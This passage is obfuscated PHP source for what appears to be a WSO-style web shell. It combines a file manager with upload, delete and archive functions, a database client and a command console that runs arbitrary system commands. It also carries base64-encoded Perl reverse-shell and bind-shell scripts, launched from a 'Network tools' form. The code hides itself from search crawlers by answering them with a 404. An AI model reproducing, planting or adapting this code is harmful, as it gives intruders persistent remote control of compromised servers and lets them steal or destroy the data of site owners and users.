Can\'t open file");window.history.back(-1)</script>'); } goto b110c; e2ecd: $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); goto B544e; a0e4c: e4824: goto Cf346; d736a: switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); goto e4824; case "UTF-8": $db->setCharset('utf8'); goto e4824; case "KOI8-R": $db->setCharset('koi8r'); goto e4824; case "KOI8-U": $db->setCharset('koi8u'); goto e4824; case "cp866": $db->setCharset('cp866'); goto e4824; } goto e3a09; B544e: $db->selectdb($_POST['sql_base']); goto d736a; b110c: } goto A0b9f; A0b9f: wSfETHeader(); goto E2321; b8339: echo ">PostgreSql</option></select></td>\r\n<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td>\r\n<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td>\r\n<td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td><td>"; goto F6568; Ada85: if (@$_POST['type'] == 'pgsql') { echo 'selected'; } goto b8339; B118d: } goto Bf71b; fa248: $default_action = 'FilesMan'; goto bdf9c; e8bc9: function wSfETEx($in) { goto e2b6a; e2b6a: $out = ''; goto B7764; B7764: if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { goto Fd50d; Cbb5e: @passthru($in); goto d1f5f; Fd50d: ob_start(); goto Cbb5e; d1f5f: $out = ob_get_clean(); goto Ad24b; Ad24b: } elseif (function_exists('system')) { goto E0d40; E0d40: ob_start(); goto e70de; D21c4: $out = ob_get_clean(); goto cf5b0; e70de: @system($in); goto D21c4; cf5b0: } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { goto F428c; D4e71: B019f: goto d7326; c1b5d: goto B019f; goto Ed5c9; F428c: $out = ""; goto D4e71; Ed5c9: c7ed5: goto d24cb; d24cb: pclose($f); goto f2c4d; ad0fa: $out .= fread($f, 1024); goto c1b5d; d7326: if (@feof($f)) { goto c7ed5; } goto ad0fa; f2c4d: } goto b91e0; b91e0: return $out; goto Ad35c; Ad35c: } goto C996e; bfe7c: $auth_pass = ""; goto E2d86; fcf40: if (isset($_POST['c'])) { @chdir($_POST['c']); } goto Edad8; A9872: if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) { $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $default_use_ajax; } goto D33b8; F3ad7: function actionFilesMan() { goto Ebf8f; d9dee: $ow = @posix_getpwuid(@fileowner($dirContent[$i])); goto e891d; d5a8b: goto a11cb; goto Cf334; Db3b9: if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) { $files[] = array_merge($tmp, array('type' => 'file')); } elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); } elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'dir')); } goto e7e51; a2605: echo "<tr><td colspan=7>\r\n\t<input type=hidden name=a value='FilesMan'>\r\n\t<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>\r\n\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; goto f5da9; f4fc7: foreach ($files as $f) { goto Af4fc; ee579: Bcb1d: goto A4ee0; Af4fc: echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . ($f['type'] == 'file' ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . ($f['type'] == 'file' ? wSfETViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file' ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>'; goto cfc9b; cfc9b: $l = $l ? 0 : 1; goto ee579; A4ee0: } goto E11d2; df011: if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && ($_COOKIE['act'] == 'zip' || $_COOKIE['act'] == 'tar')) { echo "file name: <input type=text name=p2 value='wSfET_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'> "; } goto b775a; Ebf8f: if (!empty($_COOKIE['f'])) { $_COOKIE['f'] = @unserialize($_COOKIE['f']); } goto fee17; c3797: $i = 0; goto ffcc2; ba3a9: $sort = array('name', 1); goto B05c2; E0aef: echo "<script>\r\n\tfunction sa() {\r\n\t\tfor(i=0;i<d.files.elements.length;i++)\r\n\t\t\tif(d.files.elements[i].type == 'checkbox')\r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\r\n\t}\r\n</script>\r\n<table width='100%' class='main' cellspacing='0' cellpadding='2'>\r\n<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>"; goto Ff7e0; d02ae: global $sort; goto ba3a9; cf606: $l = 0; goto f4fc7; a7020: $dirContent = wSfETScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']); goto bb49f; fee17: if (!empty($_POST['p1'])) { goto c99ff; f382d: d883f: goto c7856; c99ff: switch ($_POST['p1']) { case 'uploadFile': if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) { echo "Can't upload file!"; } goto d883f; case 'mkdir': if (!@mkdir($_POST['p2'])) { echo "Can't create new dir"; } goto d883f; case 'delete': goto Eff40; Eff40: function deleteDir($path) { goto b362d; Ba3db: E4579: goto fa697; fa697: closedir($dh); goto c12ad; C6ce7: if ($type == "dir") { deleteDir($item); } else { @unlink($item); } goto a3bdd; c12ad: @rmdir($path); goto Cd7e9; ac446: $type = filetype($item); goto C6ce7; a2e8f: if (!(($item = readdir($dh)) !== false)) { goto E4579; } goto Aceb1; Dbf56: if (basename($item) == ".." || basename($item) == ".") { goto F1fdb; } goto ac446; a3bdd: goto F1fdb; goto Ba3db; B3178: F1fdb: goto a2e8f; Aceb1: $item = $path . $item; goto Dbf56; b362d: $path = substr($path, -1) == '/' ? $path : $path . '/'; goto b909f; b909f: $dh = opendir($path); goto B3178; Cd7e9: } goto b5834; b5834: if (is_array(@$_POST['f'])) { foreach ($_POST['f'] as $f) { goto cf0d3; Abf36: $f = urldecode($f); goto A324b; A324b: if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } goto f2bea; f2bea: Bcdc6: goto cf12d; cf0d3: if ($f == '..') { goto Bcdc6; } goto Abf36; cf12d: } F6e30: } goto deba2; deba2: goto d883f; goto Ed8ea; Ed8ea: case 'paste': goto fa1af; fa1af: if ($_COOKIE['act'] == 'copy') { goto b6b49; a5cbc: foreach ($_COOKIE['f'] as $f) { copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']); e627d: } goto d9336; d9336: b219f: goto a242f; b6b49: function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { goto a5be8; D1ad3: goto d21ba; goto f4693; Edf6e: d21ba: goto ef04b; fa65b: if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } goto D1ad3; c6cd7: $h = @opendir($c . $s); goto Edf6e; a5be8: mkdir($d . $s); goto c6cd7; f4693: cf0f5: goto bc811; ef04b: if (!(($f = @readdir($h)) !== false)) { goto cf0f5; } goto fa65b; bc811: } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto a5cbc; a242f: } elseif ($_COOKIE['act'] == 'move') { goto Df529; Df529: function move_paste($c, $s, $d) { if (is_dir($c . $s)) { goto F807a; A22fe: Abf5a: goto f123a; C22e1: if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } goto e8e43; F807a: mkdir($d . $s); goto dc55e; dc55e: $h = @opendir($c . $s); goto A22fe; f123a: if (!(($f = @readdir($h)) !== false)) { goto D9794; } goto C22e1; C4ae6: D9794: goto cccd5; e8e43: goto Abf5a; goto C4ae6; cccd5: } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto fb76b; fb76b: foreach ($_COOKIE['f'] as $f) { @rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f); A96f5: } goto cafa9; cafa9: Bb913: goto A0757; A0757: } elseif ($_COOKIE['act'] == 'zip') { if (class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { goto fd375; ecac6: chdir($GLOBALS['cwd']); goto E747f; fd375: chdir($_COOKIE['c']); goto e0d42; E747f: $zip->close(); goto C77d6; e0d42: foreach ($_COOKIE['f'] as $f) { goto a00c1; a00c1: if ($f == '..') { goto f3007; } goto C52e9; C52e9: if (@is_file($_COOKIE['c'] . $f)) { $zip->addFile($_COOKIE['c'] . $f, $f); } elseif (@is_dir($_COOKIE['c'] . $f)) { goto dc789; F6130: d56b6: goto Fad9a; dc789: $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS)); goto D4124; D4124: foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); c5a99: } goto F6130; Fad9a: } goto d80d2; d80d2: f3007: goto Dd86a; Dd86a: } goto b2217; b2217: D1a22: goto ecac6; C77d6: } } } elseif ($_COOKIE['act'] == 'unzip') { if (class_exists('ZipArchive')) { goto fc7fe; A5c8b: Edd2d: goto b268f; fc7fe: $zip = new ZipArchive(); goto Dde6e; Dde6e: foreach ($_COOKIE['f'] as $f) { if ($zip->open($_COOKIE['c'] . $f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } E37a4: } goto A5c8b; b268f: } } elseif ($_COOKIE['act'] == 'tar') { goto Dc7f9; Dc7f9: chdir($_COOKIE['c']); goto f8d31; f8d31: $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); goto dab58; e932a: chdir($GLOBALS['cwd']); goto Dca9f; dab58: wSfETEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); goto e932a; Dca9f: } goto d6133; d6133: unset($_COOKIE['f']); goto ba98b; ba98b: setcookie('f', '', time() - 3600); goto bb2bb; bb2bb: goto d883f; goto C9840; C9840: default: if (!empty($_POST['p1'])) { goto B04df; B04df: wSfETsetcookie('act', $_POST['p1']); goto df85f; f76f4: wSfETsetcookie('c', @$_POST['c']); goto a865e; df85f: wSfETsetcookie('f', serialize(@$_POST['f'])); goto f76f4; a865e: } goto d883f; } goto a38c3; a38c3: f43dc: goto f382d; c7856: } goto Bec49; Ccd1b: $i++; goto d5a8b; c02b0: usort($files, "wSfETCmp"); goto da3eb; a4281: $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wSfETPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i])); goto Db3b9; ad471: echo "<option value='tar'>Compress (tar.gz)</option>"; goto ad499; e891d: $gr = @posix_getgrgid(@filegroup($dirContent[$i])); goto a4281; Bf820: function wSfETCmp($a, $b) { if ($GLOBALS['sort'][0] != 'size') { return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1); } else { return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1); } } goto c02b0; Ff7e0: $dirs = $files = array(); goto d340f; ad499: if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) { echo "<option value='paste'>Paste / Compress</option>"; } goto c0130; e7e51: E1def: goto Ccd1b; d340f: $n = count($dirContent); goto c3797; B05c2: if (!empty($_POST['p1'])) { if (preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['p1'], $match)) { $sort = array($match[1], (int) $match[2]); } } goto E0aef; E11d2: C475b: goto a2605; b775a: echo "<input type='submit' value='>>'></td></tr></form></table></div>"; goto cb32f; c0130: echo "</select> "; goto df011; Bec49: wSfETHeader(); goto F0253; A3d94: if (!($i < $n)) { goto a43b9; } goto d9dee; ffcc2: a11cb: goto A3d94; F0253: echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; goto a7020; bb49f: if ($dirContent === false) { goto eb9bd; eb9bd: echo 'Can\'t open this folder!'; goto b9450; b9450: wSfETFooter(); goto cf97d; cf97d: return; goto Eade6; Eade6: } goto d02ae; da3eb: usort($dirs, "wSfETCmp"); goto D491d; e9b0b: $GLOBALS['sort'] = $sort; goto Bf820; f5da9: if (class_exists('ZipArchive')) { echo "<option value='zip'>Compress (zip)</option><option value='unzip' selected>Uncompress (unzip)</option>"; } goto ad471; Cf334: a43b9: goto e9b0b; cb32f: wSfETFooter(); goto E6db3; D491d: $files = array_merge($dirs, $files); goto cf606; E6db3: } goto Febb4; Bf71b: function actionNetwork() { goto B1680; b37eb: if (isset($_POST['p1'])) { goto B0502; D5823: if ($_POST['p1'] == 'bcp') { goto E441d; D0171: echo "<pre class=ml1>{$out}\n" . wSfETEx("ps aux | grep bc.pl") . "</pre>"; goto C8a87; F5a58: sleep(1); goto D0171; E7641: $out = wSfETEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &"); goto F5a58; E441d: cf("/tmp/bc.pl", $back_connect_p); goto E7641; C8a87: unlink("/tmp/bc.pl"); goto f7cf0; f7cf0: } goto A6062; bbb08: if ($_POST['p1'] == 'bpp') { goto D24a2; ead8d: $out = wSfETEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &"); goto fa734; D24a2: cf("/tmp/bp.pl", $bind_port_p); goto ead8d; df4db: unlink("/tmp/bp.pl"); goto dbd72; fa734: sleep(1); goto a7c05; a7c05: echo "<pre class=ml1>{$out}\n" . wSfETEx("ps aux | grep bp.pl") . "</pre>"; goto df4db; dbd72: } goto D5823; B0502: function cf($f, $t) { $w = @fopen($f, "w") or @function_exists('file_put_contents'); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } goto bbb08; A6062: } goto abea5; abea5: echo '</div>'; goto d0eba; d0eba: wSfETFooter(); goto E3062; A50d4: $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; goto C05d2; C05d2: $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; goto Ecf0b; Ecf0b: echo "<h1>Network tools</h1><div class=content>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">\r\n\t<span>Bind port to /bin/sh [perl]</span><br/>\r\n\tPort: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">\r\n\t<span>Back-connect [perl]</span><br/>\r\n\tServer: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form><br>"; goto b37eb; B1680: wSfETHeader(); goto A50d4; E3062: } goto E9b4b; Edad8: $cwd = @getcwd(); goto c0196; c0196: if ($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } goto E00a5; fa802: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = 'win'; } else { $os = 'nix'; } goto B4b88; Bf45b: function wSfETPerms($p) { goto D73bf; E11f7: $i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-'); goto Ba0ff; cac14: $i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-'); goto A949a; Ed4db: $i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-'); goto f8559; D73bf: if (($p & 0xc000) == 0xc000) { $i = 's'; } elseif (($p & 0xa000) == 0xa000) { $i = 'l'; } elseif (($p & 0x8000) == 0x8000) { $i = '-'; } elseif (($p & 0x6000) == 0x6000) { $i = 'b'; } elseif (($p & 0x4000) == 0x4000) { $i = 'd'; } elseif (($p & 0x2000) == 0x2000) { $i = 'c'; } elseif (($p & 0x1000) == 0x1000) { $i = 'p'; } else { $i = 'u'; } goto c9f8f; f8559: return $i; goto f1042; A949a: $i .= $p & 0x4 ? 'r' : '-'; goto baed3; Ba0ff: $i .= $p & 0x20 ? 'r' : '-'; goto e9b37; e9b37: $i .= $p & 0x10 ? 'w' : '-'; goto cac14; baed3: $i .= $p & 0x2 ? 'w' : '-'; goto Ed4db; fc94f: $i .= $p & 0x80 ? 'w' : '-'; goto E11f7; c9f8f: $i .= $p & 0x100 ? 'r' : '-'; goto fc94f; f1042: } goto C84fc; defc3: function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } goto Ca12b; daf69: @ini_set('max_execution_time', 0); goto f41c4; C84fc: function wSfETPermsColor($f) { if (!@is_readable($f)) { return '<font color=#FF0000>' . wSfETPerms(@fileperms($f)) . '</font>'; } elseif (!@is_writable($f)) { return '<font color=white>' . wSfETPerms(@fileperms($f)) . '</font>'; } else { return '<font color=#25ff00>' . wSfETPerms(@fileperms($f)) . '</font>'; } } goto C4353; Cd1d3: if (get_magic_quotes_gpc()) { goto D35cb; Af525: $_COOKIE = wSfETstripslashes($_COOKIE); goto de29f; D35cb: function wSfETstripslashes($array) { return is_array($array) ? array_map('wSfETstripslashes', $array) : stripslashes($array); } goto b10e9; b10e9: $_POST = wSfETstripslashes($_POST); goto Af525; de29f: } goto F0df5; E2387: if (!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } goto Ca950; E7738: if (!empty($auth_pass)) { if (isset($_POST['pass']) && md5($_POST['pass']) == $auth_pass) { wSfETsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || $_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass) { wSfETLogin(); } } goto fa802; f41c4: @set_time_limit(0); goto Cd1d3; Ae684: function wSfETFooter() { $is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>"; echo "\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>\r\n\t<tr>\r\n\t\t<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>\r\n\t\t<td><form method='post' ENCTYPE='multipart/form-data'>\r\n\t\t<input type=hidden name=a value='FilesMAn'>\r\n\t\t<input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>\r\n\t\t<input type=hidden name=p1 value='uploadFile'>\r\n\t\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t\t<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>\r\n\t</tr></table></div></body></html>"; } goto a0cf9; B4b88: $safe_mode = @ini_get('safe_mode'); goto Acf4d; ffee1: function actionConsole() { goto Fa6b7; A9303: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { wSfETsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto b0d34; c4a99: echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; goto cc753; E6e1e: E1365: goto a21b7; F1c82: echo '</form></div><script>d.cf.cmd.focus();</script>'; goto E79a7; a21b7: echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; goto Ec62f; b0d34: wSfETHeader(); goto bc254; cc753: foreach ($GLOBALS['aliases'] as $n => $v) { goto E18ba; Edc43: ed8ae: goto c59da; a1c44: echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>'; goto Edc43; E18ba: if ($v == '') { echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>'; goto ed8ae; } goto a1c44; c59da: } goto E6e1e; Ec62f: if (!empty($_POST['p1'])) { echo htmlspecialchars("\$ " . $_POST['p1'] . "\n" . wSfETEx($_POST['p1'])); } goto b5fb6; bc254: echo "<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array('');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n\tvar n = (window.Event) ? e.which : e.keyCode;\r\n\tif(n == 38) {\r\n\t\tcur--;\r\n\t\tif(cur>=0)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur++;\r\n\t} else if(n == 40) {\r\n\t\tcur++;\r\n\t\tif(cur < cmds.length)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur--;\r\n\t}\r\n}\r\nfunction add(cmd) {\r\n\tcmds.pop();\r\n\tcmds.push(cmd);\r\n\tcmds.push('');\r\n\tcur = cmds.length-1;\r\n}\r\n</script>"; goto c4a99; E79a7: wSfETFooter(); goto D4190; Bdecf: if (isset($_POST['ajax'])) { goto f1be7; ace72: $temp = ob_get_clean(); goto b351a; Eabda: echo "d.cf.output.value+='" . $temp . "';"; goto E8f45; E8f45: echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; goto ace72; b351a: echo strlen($temp), "\n", $temp; goto e7b3e; e7b3e: exit; goto ca65c; Bda13: ob_start(); goto F1533; Ee30b: $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n\$ " . $_POST['p1'] . "\n" . wSfETEx($_POST['p1']), "\n\r\t\\'\0")); goto b7c9c; f1be7: wSfETsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto Bda13; b7c9c: if (preg_match("!.*cd\\s+([^;]+)\$!", $_POST['p1'], $match)) { if (@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='" . $GLOBALS['cwd'] . "';"; } } goto Eabda; F1533: echo "d.cf.cmd.value='';\n"; goto Ee30b; ca65c: } goto A9303; b5fb6: echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; goto F1c82; Fa6b7: if (!empty($_POST['p1']) && !empty($_POST['p2'])) { wSfETsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif (!empty($_POST['p1'])) { wSfETsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0); } goto Bdecf; D4190: } goto defc3; Ccd2c: $default_charset = 'Windows-1251'; goto E2387; b33c0: if (empty($_POST['a'])) { if (isset($default_action) && function_exists('action' . $default_action)) { $_POST['a'] = $default_action; } else { $_POST['a'] = 'SecInfo'; } } goto C653b; c9a61: if (!function_exists("posix_getgrgid") && strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false) { function posix_getgrgid($p) { return false; } } goto e8bc9; Ffa74: exit;